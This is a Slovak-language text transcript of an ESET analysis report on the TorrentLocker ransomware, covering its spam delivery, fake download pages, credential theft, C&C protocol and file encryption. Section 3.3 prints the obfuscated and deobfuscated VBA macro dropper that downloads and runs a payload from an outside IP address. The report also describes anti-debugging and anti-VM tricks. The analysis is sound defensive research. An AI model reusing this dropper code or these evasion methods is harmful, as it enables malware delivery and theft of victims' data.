Marc-Etienne M.Léveillé · PDF fileZločinci požadujú peňažné...
Transcript of Marc-Etienne M.Léveillé · PDF fileZločinci požadujú peňažné...
TorrentLockerDigitálny výpalník v okolitých krajinách
Marc-Etienne M.LéveilléDecember 2014
TorrentLockerDigitálny výpalník v okolitých krajinách
Marc-Etienne M.LéveilléDecember 2014
OBSAH1. Zhrnutie 3
2. Predstavenie 5
3. Infekčný vektor 6 3.1 Stránka na stiahnutie 7
3.2 CAPTCHA 8
3.3 Dokument programu Word s makrami VBA 9
4. Celková schéma 10
5. Analýza malvéru 12 5.1 Obfuskácia 12
5.1.1 Dropper 12
5.1.2 Spúšťač 13
5.2 Miestne ukladanie 13
5.3 Krádež prihlasovacích údajov k protokolu SMTP a adresára 14
5.4 Sieťový protokol 15
5.4.1 Výber C&C servera 15
5.4.2 Komunikačný protokol 15
5.4.3 Generovanie identifikačného kódu obete 17
5.5 Šifrovanie 18
6. Analýza dešifrovacieho softvéru 20
7. Podobnosť s bankovým trójskym koňom Hesperbot 21 7.1 Podobnosť stránok určených na šírenie malvéru 21
7.2 Opätovné použitie C&C servera 21
7.3 Cesta k súboru PDB 22
8. Štatistika 23 8.1 Metodológia 23
8.2 Výsledky 23
9. Záver 26
10. Poďakovanie 27
11. Odkazy 27
12. Prílohy 29 Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér 29
Príloha B: Zoznam známych domén, na ktorýchh sa nachádza stránka, z ktorej sa stiahne malvér 33
Príloha C: Zoznam známych URL adries .onion, ktoré doručujú informácie o platbe 37
Príloha D: Domény v TorrentLocker DGA 38
Príloha E: Zoznam typov súborov, ktoré TorrentLocker šifruje 39
Príloha F: Zoznam zakódovaných kľúčov 40
Príloha G: Zoznam príkladov 41
ZOZNAM TABULIEK
ZOZNAM OBRÁZKOV
Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie 8
Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera. 14
Tabuľka č. 3. Štruktúra správ zasielaných do C&C server. 15
Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera 17
Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru. 19
Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experiment. 23
Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera. 25
Obrázok č. 1. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej e-mailovej správy. 6
Obrázok č. 2. Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows. 7
Obrázok č. 3. Príklady stránok, z ktorých sa stiahol malvér. 8
Obrázok č. 4. Od infekcie až po zablokovaný stav. 10
Obrázok č. 5. Príklad stránky s výkupným v anglickom jazyku. 11
Obrázok č. 6. Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu. 11
Obrázok č. 7. Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov. 12
Obrázok č. 8. Žiadosť o OutputDebugString, 320 500 krát 13
Obrázok č. 9. Použitie chráneného uloženia API na získanie konfigurácie e-mailového klienta. 14
Obrázok č. 10. Rozloženie adresára klienta Thunderbird. 14
Obrázok č. 11. Príklad správy odoslanej do C&C servera. 16
Obrázok č. 12. Snímka obrazovky dešifrovacieho softvéru. 20
Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria. 20
Obrázok č. 14. Porovnanie URL adries stránok. 21
Obrázok č. 15. Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér. 24
Obrázok č. 16. Počet infekcií podľa krajín. 24
Obrázok č. 17. DHL - Rakúsko a Nemecko. 29
Obrázok č. 18. Office of State Revenue – Austrália. 29
Obrázok č. 19. Auspost – Austrália. 30
Obrázok č. 20. Česká pošta — Česká republika. 30
Obrázok č. 21. TTNet — Turecko. 31
Obrázok č. 22. Royal Mail — Veľká Británia. 31
Obrázok č. 23. SDA — Taliansko. 32
3
TorrentLocker
1. ZHRNUTIERansomvér je trieda škodlivého kódu rozširovaného kybernetickými zločincami, ktorí „unesú“ počítač obete, napr. prostredníctvom zašifrovania dokumentov obete, príp. obmedzenia prístupu k aplikáciám. Zločinci požadujú peňažné výkupné za účelom „odblokovania“ infikovaného počítača.
Win32/Filecoder.DI, tiež známy pod menom TorrentLocker, patrí do skupiny ransomvéru, ktorý po spustení zakóduje dokumenty, obrázky a iné typy súborov používateľa. Od obete sa požaduje, aby zaplatila gangu zločincov až 4,081 bitcoinov (približne 1 150 eur) za účelom odšifrovania ich súborov. Toto výkupné je možné zaplatiť iba v bitcoinoch.
Názov TorrentLocker mu dali iSIGHT Partners vo svojom blogu uverejnenom v auguste 2014 [8]. Pochádza z registračného kľúča používaného malvérom na uloženie konfiguračných informácií, upod falošným názvom „Bit Torrent Application“. Posledné verzie TorrentLocker už nepoužívajú túto kľúčovú cestu na uloženie informácií.
HKEY_CURRENT_USER\Software\Bit Torrent Application\Configuration
Na základe toho, čo zistila spoločnosť Vínsula v júni 2014 [7], tkybernetickí zločinci sa rozhodli nazvať ich „projekt“ názvom Racketeer. Slovo „rack“ sa nachádza v predponách funkcií a súborov vo vzorkách samotného TorrentLockeru (rack_init, rack_encrypt_pc, …) aj v názvoch súborov skriptov na C&C serveri (rack_cfg.php, rack_admin.php, …). „Racket (v prekl. vydieranie)“ je v skutočnosti vhodným slovom na popis TorrentLockera: vytvára problém, ktorý je možné vyriešiť jedine zakúpením dešifrovacieho softvéru od zločincov.
Nižšie sa nachádza súhrn zistení, o ktorých budeme v tomto dokumente informovať.
• Z 39 670 infikovaných systémov, 570 (1,45 %) zaplatilo zločincom výkupné.
• Týchto 570 platieb gangu nám hovorí, že zarobili sumu medzi 292 700 a 585 401 amerických dolárov v bitcoinoch.
• Podľa údajov z C&C serverov, doteraz bolo zašifrovaných minimálne 284 716 813 dokumentov.
• Domnievame sa, že hráči v pozadí TorrentLockera sú rovnakí ako tí, ktorí sú za skupinou malvéru HesperBot family, bankového trójskeho koňa.
• Rozosielanie nevyžiadaných e-mailov za účelom šírenia TorrentLockeru je cielené na špecifické krajiny. Doteraz boli útoky zamerané na nasledujúce krajiny:
∙ Austrália
∙ Rakúsko
∙ Kanada
∙ Česká republika
∙ Taliansko
∙ Írsko
∙ Francúzsko
∙ Nemecko
∙ Holandsko
∙ Nový Zéland
∙ Španielsko
∙ Turecko
∙ Veľká Británia
4
TorrentLocker
∙
• Hráči v pozadí TorrentLockeru reagovali na online správy tým, že porazili indikátory kompromitácie (IOC) používané na detekciu a zmenu spôsobu, ako používajú AES z režimu CTR na režim CBC po tom, čo bol zverejnený spôsob rozbalenia hesla.
• Prvé stopy TorrentLockera, podľa telemetrie ESETu, sú z februára 2014. Online hlásenia sú tiež z tohto dátumu..
5
TorrentLocker
2. PREDSTAVENIEO TorrentLockeri sa na online stránkach objavilo mnoho informácií. Vieme, že niektoré informácie uvedené v tejto správe už boli nahlásené a analyzované. Ale z dôvodu kompletnosti sme sa rozhodli zahrnúť ich do tejto správy a uviesť organizáciu, ktorá ich nahlásila ako prvá. Na konci tohto dokumentu sa nachádza úplný zoznam odkazov.
Na konci roka 2013 si získal ransomvér CryptoLocker [21] veľkú pozornosť. Bol zistený v rámci operácie Operation Tovar [22] v polovici roka 2014. I napriek mnohým podobnostiam, TorrentLocker predstavuje iné ohrozenie.
Prvé online hlásenie o skupine malvéru TorrentLocker uverejnil TÜBİTAK BİLGEM [1] 20. februára 2014. Snímka obrazovky editora registra systému Windows jednoznačne ukazuje použitie HKCU\Software\Bit Torrent Application\Configuration tak, ako to popísali iSIGHT Partners [8] v auguste 2014.
Verzie zo začiatku roka 2014 neboli až natoľko dômyselné, ako aktuálne šírené verzie malvéru. Od obetí požadovali zaslanie e-mailových správ páchateľom, aby mohli vykonať platbu a dostať dešifrovacie kľúče. Táto časť je v súčasnosti automatizovaná vďaka platobnej stránke, ktorá oznamuje ako zaplatiť bitcoinami za účelom získania dešifrovacieho softvéru.
Účelom tejto správy je:
• predstaviť naše zistenia o najaktuálnejších verziách TorrentLockera,
• poskytnúť technické podrobnosti o šifrovaní, ktoré malvér používa
• a vytvoriť odkaz pre budúci výskum tejto hrozby a ransomvéru vo všeobecnosti.
Tento dokument je rozdelený do štyroch hlavných častí. Začína sa popisom infekčného vektora ransomvéru TorrentLocker. Potom nasleduje analýza malvéru vrátane podrobností o šifrovaní. Potom nasleduje diskusia o prepojeniach, ktoré sme zistili medzi ľuďmi okolo Hesperbota a TorrentLockera. V poslednej časti sú uvedené štatistiky získané z C&C serverov.
6
TorrentLocker
3. INFEKČNÝ VEKTORHlásenia online od obetí TorrentLockera ukazujú, že infekcia vždy začína nevyžiadanou e-mailovou správou, ktorá od obete požaduje, aby otvorila „dokument“. Týmto „dokumentom“ je v skutočnosti škodlivý spustiteľný súbor, ktorý nainštaluje TorrentLocker a zašifruje súbory. Telemetria ESETu zároveň naznačuje, že nevyžiadaná správa by mohla byť od augusta 2014 jediným spôsobom infekcie.
From:
Prílohae-mailovej správy
Cielenáe-mailováspráva
From:
Odkaz na stránku
Download
Co24xH
Stránka s malvérom s CAPTCHA
Škodlivýspustiteľný súbor
Infikovanie počítača a zakódovanie súboru
Stiahnutiea spustenie
EXE!Torrent
Locker
TL
ZIP
ZIP
VBA
Dokument MS Word obsahujúci VBA makro
Obrázok č. 1. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej e-mailovej správy
Ako je možné vidieť na obrázku č. 1, existuje niekoľko spôsobov, ako je možné spustiť škodlivý spustiteľný súbor. Boli sme svedkami všetkých zobrazených spôsobov. Napríklad v niektorých prípadoch sa TorrentLocker nachádzal v súbore .zip, ktorý bol prílohou e-mailovej správy. V ostatných prípadoch správa obsahuje prepojenie na stiahnutie súboru .zip buď priamo alebo zo stránky na stiahnutie s aktívnym testom CAPTCHA.
7
TorrentLocker
Nižšie uvádzame niekoľko príkladov predmetov správy poslanej obetiam:
• Nezaplatená faktúra
• Sledovanie balíka
• Nezaplatená pokuta za prekročenú rýchlosť
Vo všetkých prípadoch je správa zameraná špecificky na polohu obete. Napríklad, ak je predpoklad, že obeť sa nachádza v Austrálii, bude jej zaslaná falošná informácia o sledovaní balíku, ktorá vyzerá, ako keby bola zaslaná od spoločnosti Australia Post. Polohu potenciálnej obete je možné určiť pomocou domény najvyššej úrovne používanej v e-mailovej adrese cieľa alebo poskytovateľa internetového pripojenia, na ktorého odkazuje.
3.1 Stránka na stiahnutieJedným z obľúbených a efektívnych spôsobov šírenia TorrentLockera je použitie stránky na stiahnutie, ktorá imituje webové stránky miestnych firiem alebo vládnych organizácií. V tomto scenári je obeti v e-mailovej správe zaslaný odkaz na stránku. Keď obeť klikne na tento odkaz, zobrazí sa falošná stránka, ktorá navádza na stiahnutie škodlivých spustiteľných súborov.
Tieto stránky na stiahnutie sa zobrazujú iba používateľom z určitých krajín. Návštevník pochádzajúci z krajiny, ktorá nie je cielená, bude presmerovaný na stránku Google. Filtrovanie je založené na IP adrese obete.
Návštevník, ktorý otvorí stránku v operačnom systéme inom ako Windows, bude vyzvaný, aby na návštevu stránky použil počítač so systémom Windows. Na zistenie, či počítač používa Windows, používa server používateľského agenta prehliadača.
Obrázok č. 2. Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows
Hráči stojaci za týmto podvodom kupujú názvy domén, ktoré vyzerajú veľmi podobne ako skutočné domény, za účelom oklamania používateľa, ktorý si myslí, že stránky sú skutočné. V nasledujúcej tabuľke je uvedených niekoľko príkladov.
8
TorrentLocker
Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie.
Doména falošnej stránky Doména skutočnej stránkyaustpost-tracking.com
austpost.com.auaustpost-tracking.org
royalmail-tracking.orgroyalmail.com
royalmail-service.co.uk
nsw-gov.netosr.nsw.gov.au
osr-nsw-gov.net
Zoznam známych domén používaných touto skupinou pre stránky na stiahnutie a šírenie TorrentLockera v novembri 2014 je uvedený v Prílohe B.
3.2 CAPTCHAAby si obeť myslela, že stránka je skutočná, je požiadaná, aby pre stiahnutie údajného „dokumentu“ zadala CAPTCHA kód z obrázka. Tento spôsob použitia obrázka CAPTCHA dáva návštevníkovi falošný pocit bezpečia.
V prvých verziách týchto stránok mohol používateľ zadať čokoľvek a škodlivý súbor .zip sa stiahol. Na nových falošných stránkach, stránka odmietne šírenie ransomvéru v prípade zadania nesprávneho kódu z obrázka CAPTCHA.
Obrázok č. 3: Príklady stránok, z ktorých sa stiahol malvér.
Viac snímok stránok, z ktorých sa stiahol malvér, na stiahnutie nájdete v Prílohe A.
9
TorrentLocker
3.3 Dokument programu Word s makrami VBAV novembri 2014 bol spozorovaný nový spôsob infikovania. Na šírenie TorrentLockera sa stále používajú e-mailové správy, ale tento krát je to súbor .zip ako príloha k správe. Tento .zip súbor obsahuje dokument programu Word (.doc) Ak používateľ zapne makrá, spustí sa skript VBA. Skript následne stiahne a spustí binárny súbor Win 32 PE TorrentLockera.
Skript VBA je mierne obfuskovaný.
Pôvodný obfuskovaný kód VB
[...]Open Chr(82) & Chr(76) & Chr(76) & Chr(69) & Chr(81) & Chr(65) & Chr(46) & Chr(82) & Chr(72) & Chr(76) For Binary As 12‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwfPut #12, , eheqiubn‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwfClose #12‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwfcmxhwsuo:‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(49) & Chr(48) & Chr(53) & Chr(46) & Chr(49) & Chr(57) & Chr(51) & Chr(46) & Chr(57) & Chr(57) & Chr(47) & Chr(97) & Chr(46) & Chr(112) & Chr(110) & Chr(103), Environ(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(120) & Chr(101)‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwfEnd Sub‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf‘kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf
Neobfuskovaný kód
Open “RLLEQA.RHL” For Binary As 12Put #12, , eheqiubnClose #12cmxhwsuo:DownloadAndExecute “http://109.105.193.99/a.png”, Environ(“temp”) & “\J KWTYADXJUM.exe”End Sub
Tento kód slúži ako dropper, stiahne a spustí súbor so zavádzajúcim menom a.png, ktorý je v skutočnosti binárnym súborom Win32 PE, ktorý obsahuje škodlivý kód TorrentLocker.
10
TorrentLocker
4. CELKOVÁ SCHÉMA
Infikovaný
počítačZAPLAŤ
C&Cserver
1.
Počet zašifrovaných súborov sa nahlási do C&C servera
Dokumenty sa zašifrujú príslušným kľúčom
Obeti sa zobrazí stránka požadujúca výkupné
Kľúč sa zlikviduje v počítači obete
C&C server odosiela stránku s informáciou o výkupnom
TorrentLocker odosiela správu do C&C servera2.
Počítač obete je infikovaný ransomvérom TorrentLocker1.
TorrentLocker vygeneruje kľúč na zašifrovanie súborov
Šifrovací kľúč sa odošle na C&C server, kde sa uloží
2.
Obrázok č. 4: Od infekcie až po zablokovaný stav.
Keď sa spustí jadro TorrentLockera, požiada server C&C o zobrazenie stránky s výkupným. Táto stránka s výkupným je stránkou HTML s varovaním o infekcii a obsahuje odkaz na platobnú stránku. V prípade úspechu a získania stránky, TorrentLocker vygeneruje náhodný, 256-bitový kľúč s AES šifrovaním. Tento kľúč je pred odoslaním do C&C servera zašifrovaný RSA pomocou zakódovaného 2048-bitového verejného kľúča. TorrentLocker začne so šifrovaním dokumentov v počítači používateľa pomocou vygenerovaného AES kľúča. Šifrovanie je obmedzené na súbory s určitými koncovkami. Zoznam koncoviek je zakódovaný v binárnom kóde (nachádza sa v Prílohe E). Vyhľadá súbory na všetkých pripojených diskoch a sieťových zdrojoch.
Po dokončení sa kľúč vymaže z pamäte pomocou funkcie memset (aes_key, 0, aes_key_size). Ak pamäť nebola odpojená počas procesu šifrovania, je nepravdepodobné, že po úspešnom zašifrovaní sa podarí vytiahnuť kľúč z pamäte. Používa aj funkciu memsetfrom každej kópie vytvoreného kľúča. Nakoniec sa zobrazí stránka s výkupným.
11
TorrentLocker
Obrázok č. 5: Príklad stránky s výkupným v anglickom jazyku.
Stránka s výkupným obsahuje odkaz na platobnú stránku, ktorú je možné dosiahnuť prostredníctvom hostiteľského počítača siete Tor prepojeného na doménu .onion. Čo je zaujímavé, tento server prepojený na doménu .onion je v skutočnosti tým istým hostiteľským počítačom, ktorý slúži ako C&C server pre TorrentLocker. Je zakódovaný štandardným názvom domény v príkladoch TorrentLockera, čím zverejňuje ich IP adresy. Vďaka tomu je jednoduché nájsť skutočné umiestnenie servera (resp. pravdepodobne reverzného proxy servera).
Obrázok č. 6: Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu.
Na stránke sa nachádzajú odkazy na neslávne známy CryptoLocker. I napriek použitiu loga CryptoLockera, nepatrí do tej istej skupiny malvéru. Toto je pravdepodobne trik na zmätenie obetí, ktoré hľadajú pomoc, príp. jeho autori boli natoľko leniví, že sa im nechcelo vymyslieť vlastnú značku.
12
TorrentLocker
5. ANALÝZA MALVÉRU5.1 Obfuskácia
explorer.exe
“rack-core”TorrentLocker
LauncherDropper
New process
Obrázok č. 7: Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov
Pred spustením platby prebehnú dve vrstvy injektácie. Spustiteľný súbor sa šíri v súbore .zip, ktorý nazveme dropper. Tento dropper odšifruje druhú vrstvu, ktorú nazývame spúšťač (launcher). Nakoniec, spúšťač injektuje kód do explorer.exe a spustí vzdialené vlákno v exportovanom symbole __remote_entry.
5.1.1 DropperVideli sme niekoľko rôznych verzií droppera, ale táto analýza je založená na príklade s dátumom zostavenia 15. október 2014 (SHA-1 začínjúce 40B1D84B).
Dropper použije niektoré známe triky na analýzu kódovania binárneho kódu, ako napríklad dynamické rozlišovanie externých symbolov. Neštandardnou technikou zabránenia odstraňovania chýb je použitie API OutputDebugString. Za normálnych okolností, OutputDebugString neurobí nič a okamžite sa vráti, v prípade odstraňovania chýb procesu sa údaje odošlú do odstraňovača chýb (debuggera). Votrelec požiada o vykonanie funkcie 320 500 krát, kvôli čomu sa odstraňovač chýb zasekne, pretože je príliš pomalý na spracovanie všetkých týchto žiadostí. Dokáže tiež poraziť bezpečnostné mechanizmy Sandbox, ktoré spúšťajú proces v režime odstraňovania chýb. Po skončení slučky pokračuje ďalej v spúšťaní.
13
TorrentLocker
Obrázok č. 8: Žiadosť o OutputDebugString 320 500 krát
Pakovací program použije dva zdroje PE z droppera na rozbalenie jeho obsahu. Prvý zdroj obsahuje 16-bajtový kľúč na začiatku na dešifrovanie zvyšku samého seba. Nanovo dešifrovaná časť obsahuje kľúč na dešifrovanie druhého zdroja a niečoho, čo vyzerá ako konfigurácia pakovacieho programu. Zmenou tejto konfigurácie dokáže pakovací program zapnúť niektoré antivirtuálkové triky, ako napr. kontrola výsledku pokynu in alebo vpcext, ktoré sa používajú na detekciu VMWare, resp. virtualizačného softvéru VirtualPC.
Šifrovanie použité na dešifrovanie zdroja je mierne upravené RC4. Počas dešifrovania, premenná, ktorá by mala byť nastavená na nulu, zostáva bez úprav. To znamená rozdielny výsledok v dešifrovanom čistom texte. Čo je zaujímavé, táto chyba sa nachádza tiež v MiniDuke, ako to zdokumentoval F-Secure vo svojom dokumente o skupine takéhoto softvéru (strana 9). Nie je jasné, či tam táto chyba bola ponechaná zámerne, alebo iba na oklamanie hľadačov malvéru.
Čistý text druhého zdroja je súbor PE. Dropper vytvorí nový proces v pozastavenom stave, nájde pamäť v tomto novom procese, zapíše obsah dešifrovaného PE súboru a obnoví proces na jeho spustenie v počiatočnom bode. Tento nový proces nazývame spúšťač.
5.1.2 Spúšťač (launcher)Spúšťač je vcelku jednoduchý. Má dva dôvody: skopírovať dropper a spustiť „jadro“ TorrentLockera. Aby tak mohol urobiť, dešifruje a potom rozbalí DLL s aPLib a vloží svoj kód do nového procesu explorer.exe alebo svchost.exe. Ak nemá administrátorské práva, vyžiada si ich od používateľa a potom opätovne spustí dropper s nimi.
5.2 Miestne ukladanieTorrentLocker ukladá niektoré údaje priamo v infikovanom zariadení. Predtým ukladal údaje do registra systému Windows, ale najaktuálnejšie verzie používajú súbory v náhodne pomenovaných adresároch pod adresárom Application Data (Údaje aplikácie) v profile All Users (Všetci používatelia), príp. v adresári Programs (Programy). Súbory sú zašifrované kódom AES-256-CBC. Kľúč je zakódovaný v binárnej sústave a mení sa v závislosti na kampani. Existuje aj kód na vytvorenie kľúča AES založeného na dátume inštalácie systému Windows, ale vyzerá to, že tento kód sa nepoužíva. Inicializačný vektor (IV) je rovnaký vo všetkých skúmaných variantoch. Je uvedený v Prílohe F.
14
TorrentLocker
Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera.
Názov súboru (alebo kľúča registra) Obsah00000000 Číslo predstavujúce jeho aktuálny stav
(stránka s výkupným prijatá, súbory sú zašifrované, atď.)
01000000 PE súbor droppera
02000000 Cesta k dropperovi, súboru PE na disku
03000000 Obsah HTML stránky s výkupným
04000000 Počet zašifrovaných súborov
5.3 Krádež prihlasovacích údajov k protokolu SMTP a adresáraVedľajšou úlohou TorrentLockera je získavať údaje z e-mailových klientov. Ukradne prihlasovacie údaje pre nastavenia SMTP servera a adresár obete. Obsahuje kód, ktorý funguje pre Thunderbird, Outlook, Outlook Express a Windows Mail.
Obrázok č. 9: Použitie chráneného uloženia API na získanie konfigurácie e-mailového klienta.
Obrázok č. 10: Rozloženie adresára klienta Thunderbird.
Keďže vieme, že TorrentLocker sa šíri prostredníctvom nevyžiadaných e-mailových správ, krádež týchto informácií má veľký význam. Útočníci používajú zoznam e-mailových adries, ktoré získajú,
15
TorrentLocker
na rozoslanie ďalších nevyžiadaných správ. Dokáže tiež použiť poverenia protokolu SMTP na vyrovnanie reputácie legitímnych kont SMTP, na odoslanie jeho prepojení a príloh, ktoré vedú k ďalších inštaláciám TorrentLockera.
5.4 Sieťový protokolNezabudnite, že sieťový protokol popísaný v tomto dokumente je založený na príkladoch ransomvéru TorrentLocker šíreného medzi októbrom 2014 a vydaním tohto dokumentu.
5.4.1 Výber C&C serveraTorrentLocker komunikuje so svojim C&C serverom pomocou zakódovanej URL adresy nachádzajúcej sa v spustiteľnom súbore. V prípade, že doména sa nerozlúšti alebo server neodpovedá, na vytvorenie zoznamu 30 názvov domén sa použije algoritmus na generovanie domén (DGA). Funkcia DGA bola pridaná do TorrentLockera v októbri 2014. Kompletný zoznam názvov domén vygenerovaných najaktuálnejšími verziami TorrentLockera sa nachádza v Prílohe D. Jedna z nich je zaregistrovaná, ale neslúži ako C&C server (nereaguje na HTTPS). Nemyslíme si, že páchateľ túto doménu zaregistroval.
5.4.2 Komunikačný protokolTorrentLocker používa celkom jednoduchý protokol na hlásenie do svojho C&C servera. Tento protokol sa časom zmenil. Táto správa popisuje najnovšiu verziu, aktuálne používanú.
Šifrovanie
TorrentLocker používa na šifrovanie komunikácie s C&C serverom protokol SSL. O niektorých verziách je známe, že namiesto SSL používajú šifrovanie XOR, ako to popísali iSIGHT Partners [10] v septembri 2014.
Každá požiadavka HTTP POST do C&C servera obsahuje nasledovné údaje:
Tabuľka č. 3. Štruktúra správ zasielaných do C&C servera.
Typ PopisNulou ukončený reťazec s 32 znakmi (66 bajtov)
Generované identifikačné číslo počítača založené na názve počítača, verzii systému Windows a dátume inštalácie
Nulou ukončený reťazec s 32 znakmi (66 bajtov)
Názov kampane
Celé číslo, 1 bajt Typ dopytu (0 - 6)
Celé číslo, 4 bajty Dĺžka doplnkových údajoch (0 v prípade, že sa neposielajú žiadne doplnkové údaje)
n bajtov Doplnkové údaje
16
TorrentLocker
Obrázok č. 11: Príklad správy odoslanej do C&C servera.
Nižšie je uvedený obsah polí pre túto ukážkovú správu:
{ computer_id: “RICK-PC-E4C03B402B6B37D378844361” campaign_id: “ad-x” command_id: 4 (Send SMTP credentials) arg_length: 120 arg_string: “smtp.mail.yahoo.com:25:[email protected]:passw0rd123:0\r\n”}
Nižšie je uvedený zoznam dostupných typov dopytov, ktoré môžu byť odoslané do C&C servera:
17
TorrentLocker
Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera.
Typ Popis Obsah doplnkových údajov Údaje vrátené z C&C servera
0 Načítať stránku s výkupným
žiadny stránka HTML
1 Poslať kľúč AES-256 zašifrovaný RSA
Kľúč AES-256 zašifrovaný RSA žiadne
2 Poslať zašifrovaný počet súborov
Zašifrovaný počet súborov (celé číslo, 4-bajty) žiadne
3 Poslať adresár Zoznam mien a e-mailových adries v adresári žiadne4 Poslať poverenia SMTP Zoznam SMTP údajov v stĺpcoch (server, port,
užívateľské meno a heslo, atď.)žiadne
5 Poslať poverenia SMTP Podobné ako typ č. 4 žiadne6 Poslať protokoly Vlákno správy s informáciami o chybe, funkcii
a riadkužiadne
5.4.3 Generovanie identifikačného kódu obeteKeď sa počítač infikovaný TorrentLockerom nahlási do svojho C&C servera, vygeneruje sa „používateľský kód“, ktorý neskôr bude slúžiť na identifikáciu tejto obete a ktorý udáva jedinečnú adresu URL, kde je možné zaplatiť a stiahnuť softvér na dešifrovanie. URL adresa má nasledujúci tvar:
http://<dot_onion_domain_name>/buy.php?<user_code>
Pre uľahčenie prístupu k .onion doméne, stránka s výkupným obsahuje prepojenie na webové stránky pôsobiace ako prenosy na Tor2web tak, aby si obete nemuseli do počítača inštalovať webové prehliadače, kde je aktivovaný Tor, aby mali prístup na platobnú stránku.
Používateľský kód vyzerá ako náhodný reťazec 6 alfanumerických znakov. Avšak v prípade dvoch infikovaní v podobnom čase, ich používateľské kódy budú tiež podobné. Je veľmi pravdepodobné, že používateľské kódy boli buď založené na čase, príp. nasledujú postupnosť. Po ďalšej analýze zistili analytici ESETu, že serverom generované používateľské kódy sú v skutočnosti predvídateľné.
Zoberme si tri používateľské kódy vygenerované serverom v 10-sekundových intervaloch (➊).
base 36 to base 105un33i -> 353796462 -> 3537 96462 -- 3537 + 96462 = 999995up899 -> 353896461 -> 3538 96461 -- 3538 + 96461 = 999995urdf0 -> 353996460 -> 3539 96460 -- 3539 + 96460 = 99999➊ ➋ ➌ +1 -1 ➍
Používateľský kód je v skutočnosti 36-miestne celé číslo. Po konverzii do desiatkovej sústavy (➋), vznikne vysoké 9-miestne až 10-miestne celé číslo. Ak oddelíte posledných 5 číslic od ostatných (➌), dostanete dve série. Séria najdôležitejších číslic sa zakaždým zvyšuje po jednom čísle, zatiaľ čo séria najmenej dôležitých číslic sa znižuje.
Ak pridáte dve celé čísla, zistíte, že súčet je vždy 99999 (➍). Pre prevádzkovateľov to vytvára bezstavový spôsob ako overiť, či používateľský kód je legitímny alebo nie.
18
TorrentLocker
Na základe týchto vedomostí sa podarilo analytikom ESETu vyžiadať si všetky stránky s výkupným z rôznych C&C serverov. Štatistiky sú uvedené v časti Štatistiky tohto dokumentu.
5.5 ŠifrovanieV septembri 2014 uverejnil NIXU [9] blogový príspevok s trikmi, ako dešifrovať súbory zašifrované TorrentLockerom. Bolo možné rozbaliť heslo „XORovaním“ zašifrovaného súboru s veľkosťou 2 MB jeho nezašifrovanou kópiou. Používateľ Nathan Scott poskytol tiež nástroj s grafickým užívateľským rozhraním na automatizáciu dešifrovacieho procesu.
Po zverejnení informácie o možnosti rozbalenia hesla autori TorrentLockera zmenili šifrovanie, aby vylúčili túto možnosť. Heslo bolo možné rozbaliť, pretože TorrentLocker používal AES-256 v režime CTR (Counter) s rovnakým kľúčom a IV pre každý súbor. V tomto režime heslo nie je závislé na obsahu čistého textu, vďaka čomu je AES v režime CTR celé číslo v rade. Preto je na rozbalenie hesla možné použiť rovnaký kľúč použitím „XORovania“ známymi číslami. Toto heslo je možné prehrať na inom zašifrovanom dokumente na získanie čistého textu.
Na zabránenie spôsobu rozbaľovania tohto hesla autori TorrentLockera zmenili spôsob šifrovania, ktoré používajú na šifrovanie dokumentov v infikovanom systéme. Stále sa šifrujú pomocou AES-256, ale teraz používajú režim CBC (Cipher-block chaining). CBC chráni proti rozbaleniu hesla. Zvyšok šifrovania popísaného v tomto dokumente platí aj na staršie verzie TorrentLockera.
TorrentLocker používa pre potreby šifrovania knižnicu LibTomCrypt.
Generovanie kľúča
Počas infikovania sa generuje jediný kľúč AES-256. Tento kľúč sa potom používa na zašifrovanie všetkých súborov v systéme. Na vygenerovanie 256-bitového kľúča sa používa algoritmus Yarrow od LibTomCrypt, generátor pseudonáhodného čísla. Je nasadený so spätnou hodnotou nasledujúcich funkcií:
1. GetTickCount
2. GetCurrentProcessId
3. GetCurrentThreadId
4. GetDesktopWindow
5. GetForegroundWindow
